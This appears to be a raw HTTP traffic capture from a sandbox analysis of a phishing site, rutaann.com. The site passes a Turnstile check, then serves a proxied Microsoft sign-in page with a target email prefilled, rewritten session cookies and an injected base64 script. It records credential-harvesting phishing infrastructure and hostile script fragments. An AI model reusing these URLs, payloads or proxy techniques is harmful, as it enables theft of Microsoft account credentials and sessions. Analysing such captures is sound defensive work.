2025-03-25 20:29:44 UTC	987	OUT	Data Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 51 6d 79 56 32 32 79 54 42 72 74 75 55 30 5a 56 2d 50 41 6d 52 4f 56 63 31 6f 58 47 43 66 70 57 47 70 52 31 67 5a 65 6c 52 65 55 45 46 58 38 72 33 44 36 76 32 74 76 77 73 67 35 45 36 4e 64 54 6f 77 5f 32 69 58 31 45 62 64 68 32 65 45 4f 73 43 39 64 77 57 76 59 66 51 4a 61 75 65 57 75 53 7a 69 49 57 77 4e 44 6a 70 62 42 53 59 38 76 59 74 66 6e 57 53 78 64 48 67 6f 38 42 42 75 6b 49 66 31 50 53 65 62 69 4c 38 55 59 7a 47 70 6d 5f 70 6a 54 48 6a 66 4e 67 50 61 35 4c 30 52 6d 57 62 62 5f 39 73 37 63 56 78 48 59 35 73 4e 6c 6e 38 65 66 36 7a 77 65 6c 73 4b 31 48 78 53 2d 46 6b 75 42 4c 4e 52 76 6c 43 35 45 4d 74 45 75 45 30 62 48 38 41 44 63 6c 58 59 79 4e 71 73 45 4d 50 30 78 54 37 48 4b Data Ascii: cf-turnstile-response=0.QmyV22yTBrtuU0ZV-PAmROVc1oXGCfpWGpR1gZelReUEFX8r3D6v2tvwsg5E6NdTow_2iX1Ebdh2eEOsC9dwWvYfQJaueWuSziIWwNDjpbBSY8vYtfnWSxdHgo8BBukIf1PSebiL8UYzGpm_pjTHjfNgPa5L0RmWbb_9s7cVxHY5sNln8ef6zwelsK1HxS-FkuBLNRvlC5EMtEuE0bH8ADclXYyNqsEMP0xT7HK
2025-03-25 20:29:45 UTC	416	IN	HTTP/1.1 302 Found location: https://rutaann.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3J1dGFhbm4uY29tLyIsImRvbWFpbiI6InJ1dGFhbm4uY29tIiwia2V5IjoiallDUmtvczlrNVowIiwicXJjIjoiam9obi5zbWl0aEBtaWNyb3NvZnQuY29tIiwiaWF0IjoxNzQyOTM0NTg1LCJleHAiOjE3NDI5MzQ3MDV9.7W_s5qzWUU25mO-CbJ3UwXVUaS65kZepZMklv62CLjs Date: Tue, 25 Mar 2025 20:29:45 GMT Connection: close Transfer-Encoding: chunked
2025-03-25 20:29:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:45 UTC	1017	OUT	GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3J1dGFhbm4uY29tLyIsImRvbWFpbiI6InJ1dGFhbm4uY29tIiwia2V5IjoiallDUmtvczlrNVowIiwicXJjIjoiam9obi5zbWl0aEBtaWNyb3NvZnQuY29tIiwiaWF0IjoxNzQyOTM0NTg1LCJleHAiOjE3NDI5MzQ3MDV9.7W_s5qzWUU25mO-CbJ3UwXVUaS65kZepZMklv62CLjs HTTP/1.1 Host: rutaann.com Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://sso.ninerscorretora.com.br/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:46 UTC	313	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=jYCRkos9k5Z0; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; path=/; samesite=none; secure; httponly location: /?qrc=john.smith%40microsoft.com Date: Tue, 25 Mar 2025 20:29:45 GMT Connection: close Transfer-Encoding: chunked
2025-03-25 20:29:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:46 UTC	835	OUT	GET /?qrc=john.smith%40microsoft.com HTTP/1.1 Host: rutaann.com Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://sso.ninerscorretora.com.br/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
2025-03-25 20:29:46 UTC	2566	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: c2cfa80f-4efd-4d1b-a193-c464c9fce100 x-ms-ests-server: 2.1.20329.5 - FRC ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-vCl3VUy5O_j-CVB1VXJHwQ' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All Set-Cookie: esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; domain=rutaann.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=Ah-8cUX3klZPh9iRdc8cPP4; expires=Thu, 24-Apr-2025 20:29:46 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; domain=rutaann.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly Date: Tue, 25 Mar 2025 20:29:46 GMT Connection: close content-length: 21531 Content-Security-Policy: default-src data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2025-03-25 20:29:46 UTC	13818	IN	Data Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 33 56 7a 64 47 39 74 52 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 43 69 41 67 49 43 42 70 5a 69 41 6f 49 57 52 76 59 33 56 74 5a 57 35 30 4c 6e 46 31 5a 58 4a 35 55 32 56 73 5a 57 4e 30 62 33 49 6f 49 69 35 6a 64 58 4e 30 62 32 30 74 59 32 78 68 63 33 4d 69 4b 53 42 38 66 43 41 68 5a 47 Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG
2025-03-25 20:29:46 UTC	7713	IN	Data Raw: 73 73 22 3a 69 7d 29 7d 2c 4c 2e 41 64 64 46 6f 72 52 65 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 0a 76 61 72 20 74 3d 65 2e 73 72 63 7c 7c 65 2e 68 72 65 66 7c 7c 22 22 3b 4c 2e 41 64 64 28 74 2c 22 41 64 64 46 6f 72 52 65 6c 6f 61 64 22 2c 65 2e 78 69 6e 74 65 67 72 69 74 79 2c 31 2c 65 2e 74 61 67 4e 61 6d 65 2c 72 29 7d 2c 4c 2e 41 64 64 49 66 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 65 26 26 4c 2e 41 64 64 28 72 2c 74 29 7d 2c 4c 2e 4c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 68 28 30 2c 65 2c 72 29 7d 7d 76 61 72 20 64 2c 6c 2c 66 3d 77 69 6e 64 6f 77 2c 67 3d 66 2e 64 6f 63 75 6d 65 6e 74 2c 76 3d 22 2e 63 73 73 22 3b 63 2e 4f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 69 66 28 21 65 29 7b 74 68 72 Data Ascii: ss":i})},L.AddForReload=function(e,r){var t=e.src\|\|e.href\|\|"";L.Add(t,"AddForReload",e.xintegrity,1,e.tagName,r)},L.AddIf=function(e,r,t){e&&L.Add(r,t)},L.Load=function(e,r){h(0,e,r)}}var d,l,f=window,g=f.document,v=".css";c.On=function(e,r,t){if(!e){thr

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:47 UTC	1198	OUT	GET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js HTTP/1.1 Host: rutaann.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://rutaann.com/?qrc=john.smith%40microsoft.com Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; fpc=Ah-8cUX3klZPh9iRdc8cPP4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
2025-03-25 20:29:47 UTC	1242	IN	HTTP/1.1 200 OK Content-Type: application/x-javascript Content-MD5: R7Y1mgm77mqkG4LgbFphBQ== Last-Modified: Wed, 29 Jan 2025 22:54:06 GMT ETag: "0x8DD40B7D5C9F36B" x-ms-request-id: a6781632-e01e-00bf-3d77-76b6c2000000 x-ms-version: 2018-03-28 Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version Access-Control-Allow-Origin: * Cache-Control: public, max-age=27214563 Date: Tue, 25 Mar 2025 20:29:47 GMT Transfer-Encoding: chunked Connection: close, Transfer-Encoding Akamai-GRN: 0.ca6b1002.1742934587.199c5417 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2025-03-25 20:29:47 UTC	15142	IN	Data Raw: 32 32 63 66 63 0d 0a 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e Data Ascii: 22cfc/! ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright n
2025-03-25 20:29:47 UTC	16384	IN	Data Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 65 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 39 39 70 78 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 3b 76 61 72 20 74 3d 5f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 29 2c 6e 3d 74 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 2c 72 3d 74 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 2c 6f 3d 74 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 2c 7b 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3a 6e 2c 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 3a 72 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 Data Ascii: .style.position="absolute",e.style.top="-999px",document.body.appendChild(e);var t=_.getComputedStyle(e),n=t.borderLeftColor,r=t.borderRightColor,o=t.backgroundColor;return document.body.removeChild(e),{borderLeftColor:n,borderRightColor:r,backgroundColor
2025-03-25 20:29:48 UTC	16384	IN	Data Raw: 74 54 69 6d 65 22 2c 44 41 5f 45 58 50 49 52 45 3a 22 44 41 45 78 70 69 72 65 73 22 2c 53 54 53 5f 49 4c 46 54 3a 22 53 54 53 49 6e 6c 69 6e 65 46 6c 6f 77 54 6f 6b 65 6e 22 2c 53 49 47 4e 49 4e 4e 41 4d 45 3a 22 53 69 67 6e 69 6e 4e 61 6d 65 22 2c 46 49 52 53 54 5f 4e 41 4d 45 3a 22 4c 61 73 74 4e 61 6d 65 22 2c 4c 41 53 54 5f 4e 41 4d 45 3a 22 46 69 72 73 74 4e 61 6d 65 22 2c 54 49 4c 45 5f 55 52 4c 3a 22 54 69 6c 65 55 72 6c 22 2c 43 49 44 3a 22 43 49 44 22 2c 50 55 49 44 3a 22 50 55 49 44 22 7d 2c 74 2e 44 45 46 41 55 4c 54 5f 43 48 41 4e 4e 45 4c 5f 49 44 3d 22 35 33 65 65 32 38 34 64 2d 39 32 30 61 2d 34 62 35 39 2d 39 64 33 30 2d 61 36 30 33 31 35 62 32 36 38 33 36 22 2c 74 2e 44 45 46 41 55 4c 54 5f 50 52 45 46 45 52 52 45 44 5f 45 58 54 45 4e 53 Data Ascii: tTime",DA_EXPIRE:"DAExpires",STS_ILFT:"STSInlineFlowToken",SIGNINNAME:"SigninName",FIRST_NAME:"LastName",LAST_NAME:"FirstName",TILE_URL:"TileUrl",CID:"CID",PUID:"PUID"},t.DEFAULT_CHANNEL_ID="53ee284d-920a-4b59-9d30-a60315b26836",t.DEFAULT_PREFERRED_EXTENS
2025-03-25 20:29:48 UTC	16384	IN	Data Raw: 29 0a 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 73 3d 74 68 69 73 7c 7c 28 30 2c 65 76 61 6c 29 28 22 74 68 69 73 22 29 2c 75 3d 73 2e 64 6f 63 75 6d 65 6e 74 2c 63 3d 73 2e 6e 61 76 69 67 61 74 6f 72 2c 6c 3d 73 2e 6a 51 75 65 72 79 2c 64 3d 73 2e 4a 53 4f 4e 3b 6c 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 7c 7c 28 6c 3d 6a 51 75 65 72 79 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6f 3d 5b 74 2c 6e 5d 2c 28 69 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 72 3d 61 29 3f 72 2e 61 70 70 6c 79 28 74 2c 6f 29 3a 72 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 28 65 2e 65 78 70 6f 72 74 73 3d 69 29 7d 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c Data Ascii: ) */!function(a){var s=this\|\|(0,eval)("this"),u=s.document,c=s.navigator,l=s.jQuery,d=s.JSON;l\|\|"undefined"==typeof jQuery\|\|(l=jQuery),function(a){o=[t,n],(i="function"==typeof(r=a)?r.apply(t,o):r)===undefined\|\|(e.exports=i)}((function(e,t){function n(e,
2025-03-25 20:29:48 UTC	16384	IN	Data Raw: 2e 6e 6f 74 69 66 79 53 75 62 73 63 72 69 62 65 72 73 3d 69 29 3b 76 61 72 20 63 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 4a 61 3d 21 31 2c 75 26 26 6f 3d 3d 3d 73 26 26 28 6f 3d 73 2e 6e 63 3f 73 2e 6e 63 28 29 3a 73 28 29 29 3b 76 61 72 20 65 3d 6e 7c 7c 61 26 26 73 2e 73 62 28 72 2c 6f 29 3b 61 3d 6e 3d 74 3d 21 31 2c 65 26 26 73 2e 67 62 28 72 3d 6f 29 7d 29 29 3b 73 2e 71 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 26 26 73 2e 4a 61 7c 7c 28 61 3d 21 6e 29 2c 73 2e 65 64 3d 73 2e 55 2e 63 68 61 6e 67 65 2e 73 6c 69 63 65 28 30 29 2c 73 2e 4a 61 3d 74 3d 21 30 2c 6f 3d 65 2c 63 28 29 7d 2c 73 2e 70 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 7c 7c 28 72 3d 65 2c 73 2e 67 62 28 65 2c 22 62 65 66 6f 72 65 43 68 61 6e 67 65 22 29 29 7d Data Ascii: .notifySubscribers=i);var c=e((function(){s.Ja=!1,u&&o===s&&(o=s.nc?s.nc():s());var e=n\|\|a&&s.sb(r,o);a=n=t=!1,e&&s.gb(r=o)}));s.qc=function(e,n){n&&s.Ja\|\|(a=!n),s.ed=s.U.change.slice(0),s.Ja=t=!0,o=e,c()},s.pc=function(e){t\|\|(r=e,s.gb(e,"beforeChange"))}
2025-03-25 20:29:48 UTC	16384	IN	Data Raw: 2b 6e 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 72 65 74 75 72 6e 20 6e 2e 6e 65 78 74 53 69 62 6c 69 6e 67 7d 2c 43 64 3a 65 2c 56 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 65 3d 28 6f 3f 65 2e 74 65 78 74 3a 65 2e 6e 6f 64 65 56 61 6c 75 65 29 2e 6d 61 74 63 68 28 69 29 29 3f 65 5b 31 5d 3a 6e 75 6c 6c 7d 2c 53 63 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 73 5b 53 2e 61 2e 52 28 6e 29 5d 29 7b 76 61 72 20 6f 3d 6e 2e 66 69 72 73 74 43 68 69 6c 64 3b 69 66 28 6f 29 64 6f 7b 69 66 28 31 3d 3d 3d 6f 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 69 2c 61 3d 6e 75 6c 6c 3b 69 66 28 69 3d 6f 2e 66 69 72 73 74 43 68 69 6c 64 29 64 6f 7b 69 66 28 61 29 61 2e 70 75 73 68 28 69 29 3b 65 6c 73 65 20 69 66 28 65 28 69 29 29 7b 76 61 72 20 Data Ascii: +n);return null}return n.nextSibling},Cd:e,Vd:function(e){return(e=(o?e.text:e.nodeValue).match(i))?e[1]:null},Sc:function(n){if(s[S.a.R(n)]){var o=n.firstChild;if(o)do{if(1===o.nodeType){var i,a=null;if(i=o.firstChild)do{if(a)a.push(i);else if(e(i)){var
2025-03-25 20:29:48 UTC	16384	IN	Data Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 63 6f 6e 74 72 6f 6c 73 44 65 73 63 65 6e 64 61 6e 74 42 69 6e 64 69 6e 67 73 3a 21 30 7d 7d 2c 75 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 53 2e 61 2e 66 63 28 65 2c 74 28 29 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6e 29 7b 53 2e 63 5b 65 5d 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6f 2c 69 2c 61 29 7b 76 61 72 20 73 2c 75 2c 63 2c 6c 2c 64 2c 66 3d 7b 7d 3b 69 66 28 74 29 7b 69 3d 6f 2e 67 65 74 28 22 61 73 22 29 3b 76 61 72 20 70 3d 6f 2e 67 65 74 28 22 6e 6f 43 68 69 6c 64 43 6f 6e 74 65 78 74 22 29 3b 66 3d 7b 61 73 3a 69 2c 6e 6f 43 68 69 6c 64 43 6f 6e 74 65 78 74 3a 70 2c 65 78 70 6f 72 74 44 65 70 65 6e 64 65 6e Data Ascii: nction(){return{controlsDescendantBindings:!0}},update:function(e,t){S.a.fc(e,t())}},function(){function e(e,t,n){S.c[e]={init:function(e,r,o,i,a){var s,u,c,l,d,f={};if(t){i=o.get("as");var p=o.get("noChildContext");f={as:i,noChildContext:p,exportDependen
2025-03-25 20:29:48 UTC	16384	IN	Data Raw: 3d 6e 75 6c 6c 3a 54 2e 70 75 73 68 28 70 29 29 2c 70 26 26 77 2e 70 75 73 68 2e 61 70 70 6c 79 28 77 2c 70 2e 59 29 29 29 2c 43 2b 2b 3b 62 72 65 61 6b 3b 63 61 73 65 22 61 64 64 65 64 22 3a 66 6f 72 28 3b 45 3c 6b 3b 29 64 28 43 2b 2b 29 3b 44 21 3d 3d 61 3f 28 50 2e 70 75 73 68 28 79 2e 6c 65 6e 67 74 68 29 2c 64 28 44 29 29 3a 6c 28 4e 2e 76 61 6c 75 65 29 7d 66 6f 72 28 3b 45 3c 6f 2e 6c 65 6e 67 74 68 3b 29 64 28 43 2b 2b 29 3b 79 2e 5f 63 6f 75 6e 74 57 61 69 74 69 6e 67 46 6f 72 52 65 6d 6f 76 65 3d 78 7d 53 2e 61 2e 67 2e 73 65 74 28 72 2c 74 2c 79 29 2c 66 28 73 2e 62 65 66 6f 72 65 4d 6f 76 65 2c 41 29 2c 53 2e 61 2e 44 28 77 2c 73 2e 62 65 66 6f 72 65 52 65 6d 6f 76 65 3f 53 2e 6f 61 3a 53 2e 72 65 6d 6f 76 65 4e 6f 64 65 29 3b 74 72 79 7b 6d Data Ascii: =null:T.push(p)),p&&w.push.apply(w,p.Y))),C++;break;case"added":for(;E<k;)d(C++);D!==a?(P.push(y.length),d(D)):l(N.value)}for(;E<o.length;)d(C++);y._countWaitingForRemove=x}S.a.g.set(r,t,y),f(s.beforeMove,A),S.a.D(w,s.beforeRemove?S.oa:S.removeNode);try{m
2025-03-25 20:29:48 UTC	12772	IN	Data Raw: 66 79 28 6e 29 29 29 3a 62 28 22 55 73 65 72 20 6c 69 73 74 20 69 73 20 65 6d 70 74 79 2e 22 29 3b 72 65 74 75 72 6e 20 6e 7d 28 65 2e 75 73 65 72 4c 69 73 74 2c 74 29 3b 72 65 74 75 72 6e 20 6e 2e 6c 65 6e 67 74 68 3e 30 3f 7b 6e 65 77 53 65 73 73 69 6f 6e 73 3a 6e 7d 3a 73 2e 72 65 6a 65 63 74 28 22 6e 6f 55 73 65 72 73 22 29 7d 7d 29 29 7d 28 29 3a 22 63 68 72 6f 6d 65 22 3d 3d 3d 61 26 26 28 65 3d 6e 65 77 20 75 28 7b 6c 6f 67 4d 65 73 73 61 67 65 3a 62 2c 6c 6f 67 44 61 74 61 50 6f 69 6e 74 3a 79 7d 2c 6e 2e 6e 6f 6e 6f 6e 63 65 2c 22 72 75 74 61 61 6e 6e 2e 63 6f 6d 22 2c 6f 2c 69 29 2e 67 65 74 43 6f 6f 6b 69 65 73 41 73 79 6e 63 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 7c 7c 21 65 2e 6c 65 6e 67 74 68 29 72 65 Data Ascii: fy(n))):b("User list is empty.");return n}(e.userList,t);return n.length>0?{newSessions:n}:s.reject("noUsers")}}))}():"chrome"===a&&(e=new u({logMessage:b,logDataPoint:y},n.nononce,"rutaann.com",o,i).getCookiesAsync().then((function(e){if(!e\|\|!e.length)re